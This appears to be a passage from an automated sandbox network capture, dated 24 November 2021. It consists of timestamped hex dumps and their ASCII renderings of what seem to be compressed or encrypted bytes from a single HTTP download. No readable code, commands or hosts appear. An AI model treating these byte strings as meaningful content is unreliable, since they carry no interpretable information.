                                                                                                  Data Ascii: zc`%*,S}-ASKy'}B[$fdAeGfl0-dMMg58)h36ju(lyb)9f]xs4I4b0"8nh<a:7)G^GiLF1:hV sx)=`n]15<*Th+2CbF6
                                                                                                  2021-11-24 13:16:13 UTC28INData Raw: 56 19 d8 2c ac c6 38 9b 07 73 ef da 0c 8a 30 ea 5b 9e 2a 99 54 db 2b f2 db 7d 21 3d d8 0f 79 ba f1 63 14 c8 de e7 05 68 59 87 60 d2 d3 59 b3 ea 7e 6d f1 4e e6 83 0d 51 31 f8 15 94 e2 c0 4e 95 6a 21 a9 b9 00 ac fe 36 72 f4 94 6a 14 fb 83 0c 71 6a 49 dc f1 e1 1c d8 ec ec 70 ab f8 76 22 e3 f5 95 c7 83 84 25 42 f3 64 5d 26 b3 08 0b 7b 78 4a 92 59 bb 0f 9a 18 4d fc c9 f2 fa d0 ae 90 c0 52 eb a9 5c 18 a3 fa 10 a9 72 85 71 ae db bd bd 28 bc 88 9f 80 ac 41 fc 61 0c 24 9b d8 31 f1 dd c6 e8 82 5a da b8 f1 3f bb 33 06 7f 41 8c fe 6c ae fa 90 36 e0 bb 76 aa d5 f8 c6 2e 43 1e 3e 44 0a dd 06 58 88 75 e8 ec 5e 8b 7d 24 b3 84 77 86 7b 4c 0e aa da 49 39 a9 e0 6c 06 80 6e b8 eb d6 31 7f ad 8a 9d 3b d1 b5 6e f6 ce 01 a2 0c 91 ef 42 07 f8 34 3a 54 88 e1 40 c9 0b cd fa b7 ec
                                                                                                  Data Ascii: V,8s0[*T+}!=ychY`Y~mNQ1Nj!6rjqjIpv"%Bd]&{xJYMR\rq(Aa$1Z?3Al6v.C>DXu^}$w{LI9ln1;nB4:T@
                                                                                                  2021-11-24 13:16:13 UTC29INData Raw: 00 a3 8b 4e bc b3 96 e2 67 28 6c 83 5d a4 71 2b ce 26 32 92 b5 4e bd df 39 0e 0a d7 a2 2a e9 79 ab 8c 34 09 fa 49 7c 37 0c 02 d6 7e 16 6f da b8 a4 bb d6 e3 c0 b1 99 5e 2e 97 f6 97 06 f3 64 18 3a 73 07 0a ba 5d 6f be 78 77 6c 0d fa c1 b7 34 98 73 c7 f5 58 d5 cf 83 94 68 4c 46 07 32 0c e1 9e 6f 4f 4f 47 19 1d e1 be a9 a7 20 df 8f ab 97 65 8f 8a 35 3a 9f 55 ef bc 44 13 6e ea 09 ce 0b 74 85 df 35 dc c3 47 be 61 18 d6 10 67 e0 a5 22 c5 cc a1 f1 c7 37 5b 30 e6 d1 72 78 1b df 3e d8 66 05 9b 6a 04 74 c2 48 d0 3e b8 db 82 f8 cd 39 ab 33 df e3 b2 a7 ae 65 8b 97 43 bf 64 8b f0 97 29 36 53 a7 95 67 8d 0e 37 26 e3 60 0a 70 ba 85 fa 52 06 0a c9 e8 f3 07 28 5d 54 3e 1b 61 0f 83 0b da 84 00 0a 48 ae 68 f2 e1 73 83 fc 37 39 e9 88 43 0b ba 62 e4 af b7 b0 c9 41 9f dd 8c 80
                                                                                                  Data Ascii: Ng(l]q+&2N9*y4I|7~o^.d:s]oxwl4sXhLF2oOOG e5:UDnt5Gag"7[0rx>fjtH>93eCd)6Sg7&`pR(]T>aHhs79CbA
                                                                                                  2021-11-24 13:16:13 UTC31INData Raw: 6a c6 83 a6 25 42 f3 64 5d 22 b3 08 0b 7b 78 26 6d 5f bb 47 65 1a 4d d4 36 f0 fa f4 51 95 c1 52 eb a9 5c 1a a3 fa 10 e2 10 81 6a ae db b9 c9 d7 88 e4 eb 7f f2 40 fc 65 0c 55 eb 27 0d ea df c6 ec ee a5 ee d4 9d c0 d7 43 f9 21 42 8c f6 6c df 92 6f 0a 8c d3 89 db ad 07 f4 2a 43 6a c1 28 f5 b1 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 ea 06 a2 01 85 ef 4a 07 f0 24 c5 59 f4 e1 49 c9 11 dd 05 9f 1c 07 be 9d ab 68 46 0e 4a c0 4d 32 7c 78 c0 64 f4 8a 2e 39 98 26 0d e7 d4 1e 18 52 d1 f2 d4 1d bc a9 d7 39 79 9c b7 8f 40 da 0d 16 d1 3f 81 5f cd 4d 13 59 c3 f3 83 72 f0 c6 ea 3d 51 dd 6f 13 c2 f2 21 2f 47 ca e8 27 e4 8d c0 a8 bb 37 2f b6 44 4d be 10 70 fa 36 c4 82 17 96 6d 3c 17 fb 58 47 7b
                                                                                                  Data Ascii: j%Bd]"{x&m_GeM6QR\j@eU'C!Blo*Cj(~}u^Patqw{LM9lnW4Y+.hJ$YIhFJM2|xd.9&R9y@?_MYr=Qo!/G'7/DMp6m<XG{
                                                                                                  2021-11-24 13:16:13 UTC32INData Raw: 90 4e 4f 63 e6 1c e1 aa 56 a6 20 f3 70 aa 97 29 70 8b 35 1c 9f 55 ef bc 44 16 6e ea 09 ce 0b 00 7a de 35 b0 3c 46 be 71 e7 d5 10 97 1e a7 22 29 32 a4 f0 c7 37 5b 30 e6 d1 72 78 f2 36 d7 31 aa c9 57 a6 c8 b8 0e 84 1c f2 74 17 1c 66 53 a7 d7 6c df e3 4d 58 51 9a 74 68 bc 40 a0 d4 f0 97 29 26 53 a7 95 67 8d 0e 37 26 e3 60 0a 70 ba 85 fa 52 06 0a c9 e8 f3 07 fa 02 54 3e 86 63 0f 03 5d d8 84 80 7d 4a ae e8 16 be 73 83 f3 35 39 69 70 1c 0b ba 68 84 af b7 90 a9 41 9f e1 ec 80 ab 9d a3 d6 db 79 e7 1c 14 80 1a 8d 33 68 99 42 df b7 72 f1 df 2d b3 34 89 61 b3 ce 88 69 58 e3 8b d1 8a 19 a2 63 34 8e b2 cd 10 5f fe d3 29 71 db 1c 95 da a9 aa d9 3b 24 9c eb 7d a5 ba 35 ca 2b 96 64 fc 5f de 5e 46 1c 62 ab 57 c2 a0 59 57 04 72 32 17 fa 0a f1 d6 51 af f6 03 14 8a b5 45 19
                                                                                                  Data Ascii: NOcV p)p5UDnz5<Fq")27[0rx61WtfSlMXQth@)&Sg7&`pRT>c]}Js59iphAy3hBr-4aiXc4_)q;$}5+d_^FbWYWr2QE
                                                                                                  2021-11-24 13:16:13 UTC33INData Raw: 7e a7 7d 75 e8 ec 5e 50 61 74 b3 71 77 86 7b 4c 04 ae da 4d 39 95 14 6c 0e 88 6e b5 57 d7 34 7f 59 8a 99 2b 2e b0 68 f6 ea 06 a2 01 85 ef 4a 07 f0 24 c5 59 f4 e1 49 c9 11 dd 05 9f 1c 07 be 9d ab 68 46 0e 4a c0 4d 32 7c 78 c0 64 f4 8a 2e 39 98 26 0d e7 d4 1e 18 52 d1 f2 d4 1d bc a9 d7 39 79 9c b7 8f 40 da 0d 16 d1 3f 81 5f cd 4d 13 59 c3 f3 83 72 f0 c6 ea 3d 51 dd 6f 13 c2 f2 21 2f 47 ca e8 27 e4 8d c0 a8 bb 37 2f b6 44 4d be 10 70 fa 36 c4 82 17 96 6d 3c 17 fb 58 47 7b 8e 23 67 9a 65 af 77 ea 61 eb 27 dc 05 39 63 56 6c b3 48 84 a2 54 da 2a 2c 53 7d 07 2e 9b 41 b0 3f b3 6d af de 3f 86 d2 60 18 07 5a 96 53 01 e6 b0 7a 6f 1d 68 11 a2 26 be 15 c1 fa d8 93 ce 9a 42 47 e1 02 04 1c 16 c5 93 5b d4 53 ee 78 b0 08 b8 1b d1 90 02 15 a3 a1 67 0f 03 a4 31 69 bb f3 38
                                                                                                  Data Ascii: ~}u^Patqw{LM9lnW4Y+.hJ$YIhFJM2|xd.9&R9y@?_MYr=Qo!/G'7/DMp6m<XG{#gewa'9cVlHT*,S}.A?m?`ZSzoh&BG[Sxg1i8
                                                                                                  2021-11-24 13:16:13 UTC34INData Raw: 89 23 e3 81 6e c6 83 a6 25 42 f2 64 5b 22 b3 08 3b 7a 78 26 6d 5f bb 47 65 1a 4d d4 32 f0 fa f4 51 95 c0 52 eb a9 5c 1a e3 fb 10 e2 10 81 6a ae db b9 c9 d7 8c e4 eb 7f f2 40 fd 65 05 51 eb 27 5d eb df c6 8c 6f a5 ee 7c 95 c0 d7 a7 fd 21 42 8c f6 6c df 9a e5 0a 8c bb 8c db ad e3 f0 2a 43 6a c1 28 f5 c1 f1 a7 7d 8b c8 ee 5e b4 65 74 b3 71 77 86 7b 3c b4 ac da 6f 39 95 14 88 0a 88 6e b5 57 d7 34 eb e9 88 99 ef 2c b0 68 12 ee 06 a2 01 85 ef 4a 2f f0 24 c5 79 f4 e1 49 89 11 dd 05 9e 1c 0f be 9d ab 68 46 8e 4e c0 4d 32 7c 78 c0 64 f4 8a 2e 39 98 26 0d e7 d4 1e 18 52 d1 f2 d4 05 a4 b1 d7 21 65 84 b7 ae 64 fb 0d 3f f9 16 81 6e f9 7c 13 1b 82 b1 83 30 b5 84 ea 77 1c 97 6f 41 97 a0 21 75 1a 90 e8 44 81 ee c0 c3 d2 5c 2f c5 35 3e be 6b 09 81 36 40 00 93 96 e1 b2 9b
                                                                                                  Data Ascii: #n%Bd[";zx&m_GeM2QR\j@eQ']o|!Bl*Cj(}^etqw{<o9nW4,hJ/$yIhFNM2|xd.9&R!ed?n|0woA!uD\/5>k6@
                                                                                                  2021-11-24 13:16:13 UTC35INData Raw: 32 0c e1 fe 90 4e 4f 63 e6 1c ea a4 4a b8 3e ed 6e b4 89 37 6e 95 2b 02 81 4b f1 a7 4b 1d 6e ea 09 ce 0b 00 7a de 35 b0 3c 4f a9 6f f9 cb 0e 89 00 b9 3c 37 2c ba ee d9 29 45 2e f8 cf 65 71 f2 36 d7 31 aa c9 57 a6 c8 b1 1a 98 0a ea 6a 09 02 78 4d bc c1 7b c7 f8 53 46 4f 84 6a 76 a2 55 a9 d4 f0 97 29 26 53 a7 9e 70 93 10 20 2e fa 7e 14 6e a4 9e f7 5a 0c 0d dd f6 ed 19 e4 1c 4a 20 91 68 0f 03 5d d8 84 93 72 54 b0 f6 08 b0 64 9d ed 2b 27 77 6d 0d 06 ac 63 90 b1 a9 8e b7 5f 81 ff e3 93 ab 9d a3 d6 d3 62 f9 02 08 8f 11 9c 2d 76 87 5c c1 a9 6c e3 ca 37 b8 2c 97 7f ad d0 96 77 44 eb 8b d1 8a 0b b1 7d 2a 96 be ca 04 56 e5 cd 37 6f c5 02 8b c7 a7 b2 cd 30 38 82 f5 63 b8 a4 2b d9 39 96 64 f6 41 c0 42 48 08 7c b7 5c d1 be 47 49 1a 6c 2c 09 ec 0d e8 d9 5b b4 e8 17 0e
                                                                                                  Data Ascii: 2NOcJ>n7n+KKnz5<Oo<7,)E.eq61WjxM{SFOjvU)&Sp .~nZJ h]rTd+'wmc_b-v\l7,wD}*V7o08c+9dABH|\GIl,[
                                                                                                  2021-11-24 13:16:13 UTC36INData Raw: 96 0d 0a b1 2b a7 82 75 a1 ec 82 50 5c 74 0a 71 46 86 ed 4c 21 ae a9 4d 20 95 44 6c fe 5c 91 b5 b5 66 cb 7f 8d 04 66 2b e8 db 97 f6 52 4e 5d 01 2f ca b5 07 5a 24 3a 59 66 e1 95 c9 6b dd bc 9f 7e 07 28 9d e1 68 35 0e 78 c0 1d 32 83 ac 3f 64 0b 3b d1 39 67 a8 f2 e7 2b 75 e7 52 2e ba 2b 1d 43 8c 28 39 87 9c 49 8f 9c da d1 16 68 3f 38 5f 5b 4d 85 59 b0 f3 f0 72 a0 c6 ba 3d ae 09 9f 13 3d 43 c3 2f b8 44 3c 27 1b e6 06 a8 44 7f 97 b6 bb 68 14 10 8f fa 9c c4 5e 17 04 6d 85 17 81 58 d1 7b ec 23 14 9a 2f af 27 ea 53 eb d8 08 e6 39 9c e7 ab b3 b7 0a 09 54 25 41 a3 53 82 4f 5d 9b be 95 68 b3 92 af 8b 3f 5a d2 29 18 be 5a ab 53 97 e6 81 7a 1c 1d 4d 11 f2 26 a7 15 3e 2e 0c 93 31 2b f3 47 1e 8c 8a 1c e9 ae f8 5b 2b 1b a6 78 4f 2d 9d 1b 2f 90 02 15 7f a1 67 0f ba a4 31
                                                                                                  Data Ascii: +uP\tqFL!M Dl\ff+RN]/Z$:Yfk~(h5x2?d;9g+uR.+C(9Ih?8_[MYr==C/D<'Dh^mX{#/'S9T%ASO]h?Z)ZSzM&>.1+G[+xO-/g1
                                                                                                  2021-11-24 13:16:13 UTC38INData Raw: c8 a8 1f 00 fe 96 01 56 03 3b 73 cf b5 53 4f a3 ff a3 b2 67 45 1b aa 5e da c5 c2 bb d8 fe c8 52 43 39 78 97 ba b8 4b 5b e3 d8 da 8c b2 b3 3e 0f 6e 5b d0 ff 47 8e 21 8a ef 8b e3 9b 6c 85 04 bf b0 82 6c 93 b8 e3 6e 98 25 0d b7 00 c4 63 20 3f 24 c5 8c 21 df 9b 10 87 7f 12 e2 01 d1 30 2f e7 bb 4c f8 f3 28 8f 29 65 ee ee 81 2b 06 bb e5 0c 0e eb 57 26 e4 9c e3 64 6c 94 5e 1f d9 bc 81 74 f9 70 c5 59 53 7c 2d 35 7a b0 13 9a d5 f1 4d 1f 2f a2 5e 87 5e 9f 5b 00 9c 09 3a 9b 1f 06 cd 41 00 ab 9e fd 2b ad 88 73 91 5a 2a 1d 00 ba 85 6c 0e 39 b9 95 27 17 df 03 bb 22 87 79 de c6 e9 b3 db 5f 22 ce 60 b9 1b b3 6a 93 47 52 3c 33 2d 60 16 b7 6e dc 44 6e 38 b8 ee e0 3d 7d 10 88 2d ac ee 6d d6 2c 17 29 f0 81 88 b0 7b 67 bb e6 39 a6 e0 86 66 f3 83 30 cb b7 4a ab d7 46 4e f3 a7
                                                                                                  Data Ascii: V;sSOgE^RC9xK[>n[G!lln%c ?$!0/L()e+W&dl^tpYS|-5zM/^^[:A+sZ*l9'"y_"`jGR<3-`nDn8=}-m,){g9f0JFN
                                                                                                  2021-11-24 13:16:13 UTC39INData Raw: a8 f3 76 6d ca a4 2b 63 61 1e 5a e3 7e ff 63 89 0d 60 6a bc c2 ae 1f c1 a0 d2 3e 1e d0 7d d5 2f bd 87 06 71 5b b8 68 96 db b0 aa 8d 8c 1c ff 77 2c 82 fb a2 5a 34 77 d9 26 bb 26 0a 38 c3 f4 09 67 9a 81 2a d5 b5 a5 a4 ab ed 5d 9d 74 3b 7f 56 96 5b 6a 6e 85 7a 01 78 2d 6e 91 22 da e3 d7 90 1a e4 98 72 17 40 02 ac 76 56 99 d4 1f a4 9d c5 b6 ac b1 1b 59 a3 bb 73 61 22 b6 59 3c 9c a0 82 4a 62 2a 22 4a b6 6d b9 f0 8f 88 ed 36 88 ce 6b 5f 86 6c 05 c0 31 a3 91 79 de 06 31 b7 d5 de 80 fe d5 f1 48 ef 17 c2 73 d8 4d 38 c2 e4 30 46 c6 7f 2d 23 45 dc f3 d7 c7 7b 85 82 0d 70 1f 69 d1 f1 b5 e1 3d d4 95 e0 a7 8c 27 9f 42 97 26 dd 91 fa 16 3e b4 e8 7c 7d 7e e9 90 32 68 59 1f f5 4b 53 78 af fb 0e f1 e4 f6 79 ee a3 44 57 47 3d a3 a8 22 0c 56 0a 47 30 07 35 6b ee 77 17 45 35
                                                                                                  Data Ascii: vm+caZ~c`j>}/q[hw,Z4w&&8g*]t;V[jnzx-n"r@vVYsa"Y<Jb*"Jm6k_l1y1HsM80F-#E{pi='B&>|}~2hYKSxyDWG="VG05kwE5
                                                                                                  2021-11-24 13:16:13 UTC40INData Raw: d3 f5 f3 00 82 3e 5f a6 68 d3 47 2a a5 b2 65 44 65 24 49 f1 1d 48 9d 3a 21 c1 56 4c b6 fe 7a 4d 7e ea d8 c8 ea ea 1b 64 5d 4a f8 19 df e3 22 0c 71 5e 99 27 b4 fe ef dd 6e 43 a0 6f aa 96 0c 87 1a e3 b7 20 a9 a4 29 0a ec 50 5c bf d2 ca 47 b8 69 67 eb 0b d8 45 7a 6c 24 ff 46 e0 b3 5a 4c af 32 31 67 2a dd 6d 56 20 ed 1b 2c 97 73 16 44 39 a5 f0 81 3c 38 23 e3 47 e6 3d d5 69 59 6b fb e6 c2 0e 2c 2f a0 bb cd 5d 41 3f 96 b2 bc 62 b0 0c c0 9a 50 f0 62 12 3f c6 81 7f 35 2b 12 89 20 ce 85 bb 10 28 07 40 e0 50 dc 29 95 2d df 4e d4 be cf 04 97 b5 5f f0 fb 94 dc 3b a0 34 4d 53 24 91 80 c7 35 7f 35 c7 97 cb 6a 23 45 68 73 fd b2 54 1b df 8c f4 b7 aa 19 2f e7 cb 52 ef 7c 89 3f 84 66 bb fa ae da f9 c8 3f 2f ac ce 6a a4 3e af 1f 94 8a 7b 9e a9 ea 1a d8 52 dd ca 69 46 fe 7a
                                                                                                  Data Ascii: >_hG*eDe$IH:!VLzM~d]J"q^'nCo )P\GigEzl$FZL21g*mV ,sD9<8#G=iYk,/]A?bPb?5+ (@P)-N_;4MS$55j#EhsT/R|?f?/j>{RiFz
                                                                                                  2021-11-24 13:16:13 UTC42INData Raw: 7b 10 5c 17 86 5a cc f1 c3 49 7c 39 ce 7a df a2 b1 aa 27 77 4b 25 68 c5 88 25 1c ae 9c 09 e7 a8 72 1f b2 55 30 b3 44 86 b2 96 87 8b c9 2a f9 44 7c 4a a7 b2 90 47 88 71 37 df 28 d3 6d 3b fd a7 9c 0b 3b 9e c4 56 56 a2 5a a1 ea de 52 a4 ad 0d 25 f6 f3 b3 1d 46 e2 60 26 ca 23 45 43 b9 04 c4 da 09 cf f5 3e e6 3b 65 6f d8 ec 2b de be ea cf fb dd 52 af 8e a7 44 62 f0 4b 7c c5 4e 6c d3 27 ac 0a f7 28 9b 07 a7 ef 0a ab f6 cf 99 af c5 64 24 4b 1f 0f a2 46 2c 4a 53 03 cc 26 5f 29 c5 8a ec df 9a 6c 70 93 45 03 63 aa 78 3a 4d 1f f6 75 7d 34 53 56 dc d9 9d 31 23 4e ea 9b 18 42 a9 fd 48 d6 37 45 3d b9 90 4d b8 11 89 c8 12 62 a6 ae 0c f9 e6 6e 5b e1 06 80 f0 02 f1 8c 60 b8 7a d8 52 9f 7e 55 c6 fc c8 ef 13 58 8a 37 93 41 1f 84 60 fc 20 fe 8d 4f 8f fa ba 56 d7 7d bf 36 4f
                                                                                                  Data Ascii: {\ZI|9z'wK%h%rU0D*D|JGq7(m;;VVZR%F`&#EC>;eo+RDbK|Nl'(d$KF,JS&_)lpEcx:Mu}4SV1#NBH7E=Mbn[`zR~UX7A` OV}6O
                                                                                                  2021-11-24 13:16:13 UTC43INData Raw: 2c 87 46 d1 9a 99 63 35 56 5c d0 74 62 c2 02 a3 76 3d 7a 5d a6 cf 9b d2 7f 24 62 5c 7c f0 6e 0f bf 0e 6f 2c 35 88 e9 bb 24 63 0d aa 4c b5 b0 cc e8 b0 f5 29 d2 98 49 a5 bb 10 35 b9 e8 53 56 c2 93 4f 47 23 45 f0 aa c1 63 e1 a9 1b 48 2b 1b a0 6e d3 ae 66 b6 b7 29 a9 44 44 61 69 0e 92 41 2a 7a 40 b6 af 73 f9 74 2c 93 ed de 07 bf c2 09 c9 ee dd 65 26 e4 60 53 a0 b9 10 4d 65 ef 5a 12 fd fe a2 9f d6 ac dd f4 41 e5 fe 56 a9 64 42 6c 3c b9 21 65 c3 7e f1 98 f9 2f f0 9e b3 33 69 0d 29 e0 5c d7 45 68 3d d4 e0 c8 e0 e2 02 99 68 65 33 d0 04 3e 85 30 7b 28 9f c2 1c 5b 39 6c 44 7a dc 34 7e de b9 c4 fe c5 b9 7a 63 5e 36 8f b1 3c 8a 1e 5d 04 2c 29 a7 d7 16 60 98 45 29 12 3a 21 28 cf 9b 82 31 b3 dc b9 2b a5 9b d1 3d 5b 06 8c ad c9 d2 2d 8a 97 22 35 57 c1 2d 07 ab 9b 00 ed
                                                                                                  Data Ascii: ,Fc5V\tbv=z]$b\|no,5$cL)I5SVOG#EcH+nf)DDaiA*z@st,e&`SMeZAVdBl<!e~/3i)\Eh=he3>0{([9lDz4~zc^6<],)`E):!(1+=[-"5W-
                                                                                                  2021-11-24 13:16:13 UTC44INData Raw: 98 b3 c0 17 bb 26 6b 84 f3 fc 70 8e 21 80 a7 1a 47 4f 3c 4a 19 fa f7 fc e9 3b 07 51 99 76 01 93 92 b8 03 68 cf d2 94 4b 23 6a 24 5e a0 ab 96 57 45 b7 43 40 1a 36 5e 04 a7 43 3a e0 91 c5 e4 c0 a5 33 84 27 eb a2 57 5a ae 4c d0 b1 7f 72 18 11 2a f5 10 54 20 48 0d 65 7d c3 9b 50 8a 7a 70 47 2a bf 1f 7b 87 8d 31 c8 ce 96 8b 45 c1 ee 9d ba e5 0f 24 cd c9 05 e0 cc 72 89 1d e5 95 80 f4 29 b2 ef ea 7e d4 9f 0d 06 5d 79 8a 9e 9a fd 75 84 40 63 10 94 e8 e2 81 7f 34 3c 18 c2 cd 4c 03 c0 a2 96 7d 36 49 51 7e ce 50 b7 dd 5c c2 78 7a ab c8 a4 25 4b 1e 88 89 66 ce 09 48 10 f2 60 4e 1f ce b2 30 b5 77 32 f5 ee de d2 f9 5b ce 23 cc e3 48 d6 81 98 f0 08 5b de 8e 7c eb 8e a7 dd ad 0f b0 04 50 39 42 b0 20 a7 e0 b2 c2 67 7c d2 ef b4 4f 22 c7 82 a5 e2 45 b9 5a 2e a7 25 fd 02 30
                                                                                                  Data Ascii: &kp!GO<J;QvhK#j$^WEC@6^C:3'WZLr*T He}PzpG*{1E$r)~]yu@c4<L}6IQ~P\xz%KfH`N0w2[#H[|P9B g|O"EZ.%0
                                                                                                  2021-11-24 13:16:13 UTC45INData Raw: 6f 16 01 ab ff 48 ec 28 ac 94 b3 86 d7 c2 a2 c0 bc bf a3 92 be e2 8c 35 e8 db 63 be 66 9e 98 c8 4a f8 6b 12 bf ab d6 34 b8 52 4d 7c eb 1f fe f9 b3 84 7f 1f 21 83 9e 84 4e ea be 76 1c d0 c7 1b 20 67 1b 5e 6d 78 96 b7 4d 9e 43 78 43 34 23 1b bc 8d e2 fa ae ff 54 6d 80 b3 30 90 3b 9f 9c 13 14 ab bb 2f bb 2a 0d f4 16 21 6f f8 df 48 95 a2 91 c3 11 19 0b a1 44 0d dc 2e c5 27 f7 8c 5f 9e e0 72 6e ea dc fd 1e 19 ac fd 40 20 06 f1 d0 9a 44 4e d9 57 ec 71 b7 b8 81 75 4a 0b 01 82 7b 6d bb 37 b3 a3 24 f5 cb ff 73 e0 65 5c 7f e4 64 4d ce d3 b6 63 6a c6 0b 69 ee f4 1f e3 c2 79 08 4f 35 91 7f 7a 02 af c8 01 88 2e d0 1e fd 57 08 ae bf ad 6c 37 89 66 3d 12 de b4 2c 8d 2b d8 ff 1a cc 86 c3 43 17 74 2b 1b 26 bb 0a 4c 59 5b 20 c8 42 76 d4 4a e3 95 e4 16 69 55 24 44 4a 35 0d
                                                                                                  Data Ascii: oH(5cfJk4RM|!Nv g^mxMCxC4#Tm0;/*!oHD.'_rn@ DNWquJ{m7$se\dMcjiyO5z.Wl7f=,+Ct+&LY[ BvJiU$DJ5
                                                                                                  2021-11-24 13:16:13 UTC47INData Raw: c1 2c 22 ec 00 a1 91 0d 8f 88 33 26 71 c8 19 80 62 23 70 f2 29 9c 8a 4a fc 14 b5 d7 47 c6 d5 41 f3 4f 65 ab b0 ad 7b 90 41 39 8a 7b 69 ab 7e 67 67 20 e7 49 bf c3 8e 6b c8 2c b7 b3 60 c0 4f 92 c5 ab 28 7b e7 7a 4d 81 98 4c 31 0b 5d e1 e3 e5 e6 04 4d 62 5a 86 2a 6e c1 66 17 4e dd ae c8 bf 7e 15 ed a4 7d fc 80 37 42 3c 4b 52 0f be c1 39 f4 2f 9b dd b3 d0 00 6e a6 3f e3 3c 4a ff 10 90 14 41 69 30 0e 68 77 bf a1 f5 1f ed 8b 26 3d fe da a5 5c 10 c3 0f 9b b5 04 dc 0c 0d 17 e5 28 39 4f 3f 23 bd 3a 5d fa 19 7a 53 e8 88 de f9 2c d5 c9 f6 f3 2a 12 c8 5b 1a df 8f 6f 29 3f fe 92 de 24 b8 89 ff 55 e2 ea 9a 35 c4 e2 4c a2 3e 13 90 cd 8a 11 a2 77 3c a7 74 c5 6a f9 3d 9f e4 be 7e 35 ee da 34 58 42 7d b9 fa a7 9a 3c 1a ba 78 28 0f 93 fa cb c7 d8 f3 f6 79 aa 0d 48 94 ba e1
                                                                                                  Data Ascii: ,"3&qb#p)JGAOe{A9{i~gg Ik,`O({zML1]MbZ*nfN~}7B<KR9/n?<JAi0hw&=\(9O?#:]zS,*[o)?$U5L>w<tj=~54XB}<x(yH
                                                                                                  2021-11-24 13:16:13 UTC48INData Raw: 4f 55 1b 5f 97 36 d4 da e3 94 39 46 e3 85 e9 b3 b7 4b b1 7c cf a0 aa 84 27 01 e1 2b b6 f9 d6 ea a7 45 84 bd f4 2f 7e d0 68 a4 fc 92 be 67 2b bd 33 ad 49 99 05 85 50 36 1b d1 f8 4c d6 93 b6 d4 af 01 4d cb e0 a5 26 27 20 bb 4c 02 c0 01 51 83 36 ed f8 e5 1a b8 68 f8 2a 42 86 64 d2 cf 69 70 b9 da ea c1 c4 24 5c 9f af 1e 6a 77 31 1d 8b 3c 9e 78 49 86 fd 79 72 96 a0 fe 53 3e 08 80 8a 6d 17 02 52 6f 48 9e c9 84 eb 38 6d 80 e8 77 76 83 ff f1 40 a9 8a d5 37 a7 f8 97 7d f3 e9 4f 4e 65 ae c5 f8 d0 e5 c5 d6 f3 6c c5 7e 58 6d 02 5e eb 10 50 10 89 82 10 6d b3 43 22 8b 47 c3 69 97 9f 9e 48 27 07 cb 4f 8b 67 8b 42 f2 c2 fc d3 f7 4c 0b 3c b2 23 c9 78 3d cb e2 76 9a 52 a0 c1 8b 47 80 87 f0 ce 27 23 b2 c6 47 4e e4 f2 09 98 d5 b3 d7 fe 56 7d d3 ca a5 cf 20 a4 f3 3d b0 45 52
                                                                                                  Data Ascii: OU_69FK|'+E/~hg+3IP6LM&' LQ6h*Bdip$\jw1<xIyrS>mRoH8mwv@7}ONel~Xm^PmC"GiH'OgBL<#x=vRG'#GNV} =ER
                                                                                                  2021-11-24 13:16:13 UTC49INData Raw: 32 38 84 66 84 62 33 f7 be 8f e5 d8 87 ac aa 8d 58 e7 12 07 3c b3 f5 6b 3b bd 49 6f c2 64 b3 51 8b 24 d9 b4 5a 09 98 5b d7 2c 08 ef a9 6d cf 5c c0 26 92 50 7c dc e0 26 00 2e 6b 05 04 d6 c4 86 46 9f b6 83 d6 8b 91 86 57 3e f9 41 e4 66 1f ba d6 65 16 9b 80 04 56 46 86 92 16 30 92 01 97 ed 8e 16 f9 45 9b b5 60 a0 d2 12 41 5f 82 cd bd 14 24 e1 b5 af 8f dc 09 6a 27 2e 13 37 f7 db 1e 77 27 fd f1 cc e6 a7 50 08 7a 9b 5c 90 c4 4c 7d e3 ef a3 50 eb 10 47 37 e9 08 88 32 a0 d4 15 c1 c1 9d c2 59 37 0f 64 8a 8d a8 a7 11 b4 e3 37 f8 4e dc b3 b6 e1 37 4d 63 97 1d 5a 5f 1a 22 09 4d d2 26 f8 ee 6d 14 ff 53 a5 4f eb 01 c0 4d d0 9a 2b a6 33 8f 6c c5 75 b5 fc 10 18 8e 13 28 dd 7f 41 93 d0 c4 fc 18 f9 fc ed c3 2d 0b f0 85 86 f7 8b 9e 4e 5b ca 38 1d 4b d3 61 9c dd 92 09 93 3c
                                                                                                  Data Ascii: 28fb3X<k;IodQ$Z[,m\&P|&.kFW>AfeVF0E`A_$j'.7w'Pz\L}PG72Y7d7N7McZ_"M&mSOM+3lu(A-N[8Ka<
                                                                                                  2021-11-24 13:16:13 UTC50INData Raw: fc 10 78 98 5a 1c 23 ff 18 6a 07 4d de cd 8c 26 20 95 bd c0 33 e8 3e b2 78 a0 45 9b bc 45 12 e2 2a 1e a4 62 66 cf 84 77 0b fe 10 68 16 a5 9e ae 4c 60 7d a4 fa 97 e5 5e 1b f5 8e 69 4c 29 97 45 1a d7 ac 60 f0 b5 ad ee a6 2c 94 66 da 16 be 8f 6c bc 18 2c a3 05 0e e7 ec ac 2c 47 33 0e 7b 4b 28 3b 57 74 43 cb 1c 42 d9 fc ad b1 c6 c8 4a 1c fa bb 31 47 d1 9a ee dc 33 d5 05 9e 20 ab 96 3d 31 4e 07 15 aa b7 d0 3f f8 ce 4e 9c cd a0 a6 b0 d9 d7 e8 77 e8 a6 f1 af 32 39 d5 45 3f ad e8 31 fe 90 33 cd 95 67 2e 9d 92 e2 fa 05 cb d4 89 14 4c 19 1c 03 2d a5 c7 2b f8 5b 64 28 fc cf 23 3a 4d fe a0 48 c9 37 cb 93 31 52 6d c4 68 6c a7 70 38 4d 7e 00 bd a1 e1 cb cf ed 73 b7 5e 5a 38 60 ed 22 6d cf 36 dd 6e e6 b5 3e dc 89 69 c3 01 2a 51 ca f4 30 1a e0 cf 10 4a eb b3 e2 5b d6 67
                                                                                                  Data Ascii: xZ#jM& 3>xEE*bfwhL`}^iL)E`,fl,,G3{K(;WtCBJ1G3 =1N?Nw29E?13g.L-+[d(#:MH71Rmhlp8M~s^Z8`"m6n>i*Q0J[g
